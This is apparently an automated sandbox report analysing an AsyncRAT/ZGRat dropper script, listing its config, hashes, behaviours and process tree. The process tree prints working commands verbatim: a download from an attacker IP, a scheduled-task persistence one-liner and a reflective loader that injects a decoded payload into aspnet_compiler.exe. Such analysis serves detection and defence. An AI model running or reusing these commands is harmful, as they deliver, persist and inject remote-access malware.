asyncrat | cc2de0a518487a5178c6184dcdf623ac7b89f6e7fb9a541d5630921d00a7de3e

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
10-05-2024 11:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

costs.vbs
Size

821B
MD5

d789af96fc286fcccec141524b71d243
SHA1

a19b86fe0f698015bdaab5633d94be34daa7369c
SHA256

cc2de0a518487a5178c6184dcdf623ac7b89f6e7fb9a541d5630921d00a7de3e
SHA512

6e7519c10610bf6cfa5a583455c981e24c5a0f2f31142591c49c1e75b3e21a43a575207c3b9600faa953d8f128896353b4445713b069ccd7d4238daf50a4823d

Score

10^/10

asyncrat zgrat raz_top execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://91.92.251.57:80/holo.png

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nodejs.org/download/release/latest-v0.12.x/node.exe

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Raz_Top

leet.4cloud.click:1339

Mutex

27f67b803086897f0aeff454a424394b

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/memory/1624-164-0x0000000007D90000-0x0000000007DE2000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
2388	AutoHotkey.exe
2988	AutoHotkey.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1624 set thread context of 3432	1624	powershell.exe	119
PID 456 set thread context of 4872	456	powershell.exe	139

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1144	powershell.exe
1624	powershell.exe
4112	powershell.exe
456	powershell.exe
3720	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	WScript.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
4140	powershell.exe
4140	powershell.exe
1680	powershell.exe
1680	powershell.exe
944	powershell.exe
944	powershell.exe
3756	powershell.exe
3756	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
1144	powershell.exe
1144	powershell.exe
2432	node.exe
2432	node.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
3432	aspnet_compiler.exe
4112	powershell.exe
4112	powershell.exe
4392	node.exe
4392	node.exe
456	powershell.exe
456	powershell.exe
456	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	3432	aspnet_compiler.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2388	AutoHotkey.exe
2388	AutoHotkey.exe
2988	AutoHotkey.exe
2988	AutoHotkey.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2388	AutoHotkey.exe
2388	AutoHotkey.exe
2988	AutoHotkey.exe
2988	AutoHotkey.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3432	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 3156 wrote to memory of 4140	3156	WScript.exe	83
PID 3156 wrote to memory of 4140	3156	WScript.exe	83
PID 3156 wrote to memory of 1680	3156	WScript.exe	99
PID 3156 wrote to memory of 1680	3156	WScript.exe	99
PID 3156 wrote to memory of 944	3156	WScript.exe	101
PID 3156 wrote to memory of 944	3156	WScript.exe	101
PID 3156 wrote to memory of 3756	3156	WScript.exe	104
PID 3156 wrote to memory of 3756	3156	WScript.exe	104
PID 3156 wrote to memory of 3016	3156	WScript.exe	107
PID 3156 wrote to memory of 3016	3156	WScript.exe	107
PID 3016 wrote to memory of 1164	3016	WScript.exe	108
PID 3016 wrote to memory of 1164	3016	WScript.exe	108
PID 3016 wrote to memory of 2388	3016	WScript.exe	110
PID 3016 wrote to memory of 2388	3016	WScript.exe	110
PID 3016 wrote to memory of 2388	3016	WScript.exe	110
PID 1164 wrote to memory of 3720	1164	cmd.exe	111
PID 1164 wrote to memory of 3720	1164	cmd.exe	111
PID 2388 wrote to memory of 1144	2388	AutoHotkey.exe	112
PID 2388 wrote to memory of 1144	2388	AutoHotkey.exe	112
PID 2388 wrote to memory of 1144	2388	AutoHotkey.exe	112
PID 2388 wrote to memory of 5100	2388	AutoHotkey.exe	114
PID 2388 wrote to memory of 5100	2388	AutoHotkey.exe	114
PID 2388 wrote to memory of 5100	2388	AutoHotkey.exe	114
PID 5100 wrote to memory of 2432	5100	cmd.exe	116
PID 5100 wrote to memory of 2432	5100	cmd.exe	116
PID 5100 wrote to memory of 2432	5100	cmd.exe	116
PID 2432 wrote to memory of 4564	2432	node.exe	117
PID 2432 wrote to memory of 4564	2432	node.exe	117
PID 2432 wrote to memory of 4564	2432	node.exe	117
PID 4564 wrote to memory of 1624	4564	cmd.exe	118
PID 4564 wrote to memory of 1624	4564	cmd.exe	118
PID 4564 wrote to memory of 1624	4564	cmd.exe	118
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 1624 wrote to memory of 3432	1624	powershell.exe	119
PID 2988 wrote to memory of 4112	2988	AutoHotkey.exe	132
PID 2988 wrote to memory of 4112	2988	AutoHotkey.exe	132
PID 2988 wrote to memory of 4112	2988	AutoHotkey.exe	132
PID 2988 wrote to memory of 3204	2988	AutoHotkey.exe	134
PID 2988 wrote to memory of 3204	2988	AutoHotkey.exe	134
PID 2988 wrote to memory of 3204	2988	AutoHotkey.exe	134
PID 3204 wrote to memory of 4392	3204	cmd.exe	136
PID 3204 wrote to memory of 4392	3204	cmd.exe	136
PID 3204 wrote to memory of 4392	3204	cmd.exe	136
PID 4392 wrote to memory of 1692	4392	node.exe	137
PID 4392 wrote to memory of 1692	4392	node.exe	137
PID 4392 wrote to memory of 1692	4392	node.exe	137
PID 1692 wrote to memory of 456	1692	cmd.exe	138
PID 1692 wrote to memory of 456	1692	cmd.exe	138
PID 1692 wrote to memory of 456	1692	cmd.exe	138
PID 456 wrote to memory of 4872	456	powershell.exe	139
PID 456 wrote to memory of 4872	456	powershell.exe	139
PID 456 wrote to memory of 4872	456	powershell.exe	139
PID 456 wrote to memory of 4872	456	powershell.exe	139
PID 456 wrote to memory of 4872	456	powershell.exe	139
PID 456 wrote to memory of 4872	456	powershell.exe	139
PID 456 wrote to memory of 4872	456	powershell.exe	139
PID 456 wrote to memory of 4872	456	powershell.exe	139

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\costs.vbs"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://91.92.251.57:80/holo.png' -Destination 'C:\Users\Public\holo.zip'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\holo.zip' -DestinationPath 'C:\Users\Public'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\c.zip'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\c.zip' -DestinationPath 'C:\Users\Public\'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3720
- - C:\Users\Public\AutoHotkey.exe
    "C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5100
    - - C:\Users\Public\node.exe
        
        C:\Users\Public\node.exe C:\Users\Public\run.js
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2432
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
        7⤵
        Suspicious use of SetThreadContext
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1624
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3432

C:\Users\Public\AutoHotkey.exe
C:\\Users\\Public\\AutoHotkey.exe
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3204
- - C:\Users\Public\node.exe
    C:\Users\Public\node.exe C:\Users\Public\run.js
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
        5⤵
        Suspicious use of SetThreadContext
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:456
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fe3aab3ae544a134b68e881b82b70169

SHA1
926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

SHA256
bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

SHA512
3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
64565b5b837feca7ec75ae007761e42a

SHA1
ab509d3102cb94ba00c097b131cff48c967ef54c

SHA256
4f71cf59a481912f5172a92c09c0182f95a9a679f3d533603f14e29878da980d

SHA512
0d20c85e4284c713c2132b913f98a01d4ce707026a3c605ef51a030d92a7425cf74ad0e4e85966e4cdb5c4c40605dd9f3bc7c2fd8c810e842b5346bd137f232b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d2ef5671a0473df05986c8f53303d30

SHA1
23662093a9567bc01f751bb5b9550d8f523b3620

SHA256
444543bee04ed8bd85b3eb45a667b70b470dfa8f3351673eae92f8dd4905bd4a

SHA512
3a05a2c40c43075ac2067eb28cce9b1701d80f1e1980e455a105f0c8cd2eb7ecf97cf22b80d9b41c12bd671be5c17489aabce65acd5b86226c9fb7be3ba6aabf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
122c83cceed1a0080083ec27d761c9a9

SHA1
3a36e38e60ff7ab1994f8496a54858d5bb417391

SHA256
62cc5b63be1737ea8be6f91f2021ca9514e55e404bf47a528bc228213d06248f

SHA512
bae4999b6f3fe24d892e04d7d6c8e66808ea0747368cb941165e8eb06b4bf81e39f54ad191f876da8efaaa24d57dda96b66532fdc2e6add040eaae39e59df925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
38f97f1f8f2eebcc703352af45c01ea6

SHA1
74b2e29be1fe4674eb3d966437c44c3611a1ed81

SHA256
a46ae93a0e247efb4d7072b83e8e26c92c48e9eb4a9ccb1342adecd65ca32f1b

SHA512
97c399d1c2ecbef183687c2d4b67941201783e6deac39608b0e846d38ac0317e8ab1381492828799217605a25542629baad14694478943b135494ade17186be1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
3e7a9a3871299d9d669a15648e910423

SHA1
cf2b6dc286c2415fd281e66a6951d389b64697c4

SHA256
0a2e757b04aad067937830888a2a31c5917d76086780b37635bd438f7067139b

SHA512
9667a657d7d381d296c41bac073ce16b613e7c3d4b6cb0479f57476efb848e841e23d8062f3cb8a6b5d53de3296cece60c4c13baa57bbb123e6c4391b55579e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fd9c006f79adc666e1c5f2d9e1a19c4c

SHA1
edcf0446af51a0211eeb899640c3ca0def71abbf

SHA256
d25654f6236b6bab47a8084ea58bf3408f4adf40a5486836e1a3665327dd4c0c

SHA512
aa5e95962c7865d206c4632f96f2be96ed15c733b13748a5fab5a0e3f1047698f15097d3d456cbb3907dc344e3062fd3034b2caa644cf273cdfa26f33ed1bef1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
666e20e405fea92c3da12b40e5f514fe

SHA1
48dd483e113330222b53c5c9be77862ef8505166

SHA256
3b1b382000219d2bfcd42f7fc7c7b7c796b48c5e6973d97e004a3d860624036c

SHA512
44942892af3e599cc6510e463e928d8b8957ed2ca27e2b0f5854f19238aceaf940837e955eb93d6fa610041db8b155444156945f7f80b038f8a8b3ad944f6ad2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bb74050b0cdf2a4efc5bdcb1beb8ab7d

SHA1
fa0df8adb956bcea50cc246ffa2b3f00b0612a4a

SHA256
409c6c39d95d8f3291f14a751d11315c76f0cd5305b002cff37a7a6cd0e36702

SHA512
96b28918ed5f2f582980b49b99b71ddb8d10f9cd14539b11cef365444dfca665c8a24e321548b40c843d07ed8038e7405b8ed34177041856a692f6a00f513625

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcfxzwdb.lnv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Auto.vbs

Filesize
435B

MD5
a5b25c095336368b68172d0eec88069e

SHA1
47b0b0a229e14d2125feb81c5168a7cf83b04fd1

SHA256
47d7c3b0b2b75fabf29d3b17fa4fa9d0290b26aa5d79ecb875075930e8320a5d

SHA512
c3f49848734b04d7863e1dca88a000b30e41dcbebb2867046e5957e52b93e7cb49cf4f235fb58bd698aa9a2831af5570bdfa4b44d37d7f86e66d577c0f3b29cf

Download Submit
C:\Users\Public\AutoHotkey

Filesize
339B

MD5
2312ab36e3363bfa8f217c14354aba68

SHA1
736c5cb239a94007863c03c68705b890fd051302

SHA256
c53105c99521502a13e4dd32fa591a52b4b35026c68de86aa34f68532ff94769

SHA512
dcd58e38538b9aee53fa4d9b51e563e4e42bf9c7763d2094261b3de11dd21617bcb4bb8c39f86da9409c84b2b0e52a17a56a4aa1c832a0df47201576fd91860b

Download Submit
C:\Users\Public\AutoHotkey.exe

Filesize
774KB

MD5
e63e2669a293c1a6709c373f208a48cf

SHA1
489957991f7c59ec748fb4951fa0b2dd676c8998

SHA256
b740b8ea604a8b6ee1864353cfbbcd6778187486cc408d750c7a1a93bc6a0a0c

SHA512
82655f6110ffd9fcca1572b593ad0bef51974da5a18bdecc79ee88f8d56e14157b5349fadac4f27a8df4e6537165415acb6670fa0c453c5131d67d2500b5dde9

Download Submit
C:\Users\Public\Execute.txt

Filesize
7B

MD5
40cd014b7b6251e3a22e6a45a73a64e1

SHA1
6ea36ce8d4940505e9a2c8fea5db868cd8b3d440

SHA256
e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1

SHA512
776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea

Download Submit
C:\Users\Public\Gettype.txt

Filesize
7B

MD5
9221b7b54ed96de7281d31f8ae35be6a

SHA1
223fad426aa8c753546501b0643ee1720b57bff0

SHA256
8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a

SHA512
be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d

Download Submit
C:\Users\Public\Invoke.txt

Filesize
6B

MD5
5fb833d20ef9f93596f4117a81523536

SHA1
d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5

SHA256
e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73

SHA512
afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35

Download Submit
C:\Users\Public\NewPE2.txt

Filesize
9B

MD5
8a56a0e23dbfe7a50c5ec927b73ec5f2

SHA1
abebd513e68e63e7ec6ae56327c232b6e444ce0a

SHA256
3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1

SHA512
276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2

Download Submit
C:\Users\Public\getMethod.txt

Filesize
9B

MD5
db37f91f128a82062af0f39f649ea122

SHA1
f21110ae7ac7cde74e7aa59b22ed10bace35b06b

SHA256
e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32

SHA512
681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae

Download Submit
C:\Users\Public\load.txt

Filesize
4B

MD5
ec4d1eb36b22d19728e9d1d23ca84d1c

SHA1
5dbc716c4600097b85b9e51d6aeb77a4363b03ed

SHA256
0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0

SHA512
d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700

Download Submit
C:\Users\Public\msg.txt

Filesize
734KB

MD5
028bf3579e249d565dfd9f04dc434ab6

SHA1
407c308881fbfd348fca95dc901af3a8eb8f5725

SHA256
8afd80ba32101e388b26387db832fb81d575c7d3683c2598878d1f280ebe0eaf

SHA512
ee6728671f1b6b41961ed03476dd3974ea30304616f07f97dc18a28efd27786f5f48c7d4ddc332455e03b593e0b1a0729268fc76b057161af1381ca1918f9042

Download Submit
C:\Users\Public\node.bat

Filesize
687B

MD5
52dc8ab7250ca32c7dea8867d6464e5b

SHA1
4e3202f42632fa8a2c1c632af80b8223b9ada385

SHA256
b99b7a8864e07ed15ba3e11ec6e5ad793d3a8e257321c89c7c2b7842cc674728

SHA512
f43a7fc7e9d57f46eb08a8d84dde6503b5fd65c1f2e4a28f80ca700ca2050506c05b09ad52e092c6b46f094a079580bbd863cf04ff0ea3db589d2527218ef985

Download Submit
C:\Users\Public\run.js

Filesize
1KB

MD5
660c9112523248048eaf7d9f1ee30960

SHA1
3126188624a0299d3821ae3dd6411b4905ecfd0b

SHA256
81b60a632098a246910c001762b65d85e8c00ac88be7a38529e41bdd9ae51093

SHA512
